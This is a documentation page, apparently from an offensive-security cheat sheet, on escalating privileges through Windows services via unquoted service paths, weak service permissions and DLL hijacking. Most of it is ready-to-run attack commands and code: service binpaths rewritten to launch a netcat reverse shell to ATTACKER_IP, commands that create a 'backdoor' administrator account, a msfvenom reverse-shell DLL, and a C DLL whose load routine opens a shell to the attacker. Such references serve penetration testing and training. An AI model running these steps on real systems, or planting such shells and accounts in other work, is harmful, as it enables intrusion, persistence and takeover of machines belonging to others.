> ## Documentation Index
> Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt
> Use this file to discover all available pages before exploring further.

# Service Exploits

> Privilege escalation via Windows services: unquoted paths, weak permissions, and DLL hijacking.

## Unquoted Service Paths

If a service binary path contains spaces and is not quoted, Windows tries each partial path as an executable.

### Find Vulnerable Services

```cmd theme={"dark"}
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
```

```powershell theme={"dark"}
Get-CimInstance Win32_Service | Where-Object { $_.PathName -notmatch '"' -and $_.PathName -match ' ' } | Select Name, PathName, StartMode
```

### Example

Service path: `C:\Program Files\My App\service.exe`

Windows tries in order:

```
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My App\service.exe
```

### Exploit

Check write permissions on intermediate folders:

```cmd theme={"dark"}
icacls "C:\Program Files\My App"
```

```powershell theme={"dark"}
accesschk.exe /accepteula -wdq "C:\Program Files\"
```

If writable, drop payload:

```cmd theme={"dark"}
copy shell.exe "C:\Program Files\My.exe"
sc stop VulnService
sc start VulnService
```

***

## Weak Service Permissions

### Find Modifiable Services

```cmd theme={"dark"}
accesschk.exe /accepteula -uwcqv "Everyone" *
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -uwcqv "Authenticated Users" *
```

```powershell theme={"dark"}
. .\PowerUp.ps1
Get-ModifiableService
```

Look for `SERVICE_CHANGE_CONFIG` or `SERVICE_ALL_ACCESS`.

### Modify Service Binary Path

```cmd theme={"dark"}
sc config VulnService binpath= "C:\Windows\Temp\nc.exe -e cmd.exe ATTACKER_IP 4444"
sc stop VulnService
sc start VulnService
```

### Modify to Add Admin User

```cmd theme={"dark"}
sc config VulnService binpath= "net user backdoor P@ssw0rd /add"
sc stop VulnService
sc start VulnService

sc config VulnService binpath= "net localgroup administrators backdoor /add"
sc stop VulnService
sc start VulnService
```

### Modifiable Service Binary

If the `.exe` itself is writable:

```cmd theme={"dark"}
icacls "C:\Path\to\service.exe"
```

Replace with payload:

```cmd theme={"dark"}
move service.exe service.exe.bak
copy shell.exe service.exe
sc stop VulnService
sc start VulnService
```

***

## DLL Hijacking

Service loads a DLL that doesn't exist or is loaded from a writable directory.

### Find Missing DLLs

Use Process Monitor (procmon) with filters:

```
Result = NAME NOT FOUND
Path ends with .dll
```

### Check DLL Search Order

Windows searches in order:

```
1. Application directory
2. C:\Windows\System32
3. C:\Windows\System
4. C:\Windows
5. Current directory
6. PATH directories
```

### Check PATH for Writable Directories

```powershell theme={"dark"}
$env:PATH -split ';' | ForEach-Object { icacls $_ 2>$null } | findstr /i "Everyone Users BUILTIN"
```

### Create Malicious DLL

```bash theme={"dark"}
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f dll -o hijack.dll
```

Minimal C DLL:

```c theme={"dark"}
#include <windows.h>
#include <stdlib.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("cmd.exe /c C:\\Windows\\Temp\\nc.exe -e cmd.exe ATTACKER_IP 4444");
    }
    return TRUE;
}
```

Compile on Kali:

```bash theme={"dark"}
x86_64-w64-mingw32-gcc -shared -o hijack.dll hijack.c
```

Drop DLL in writable path and restart service.
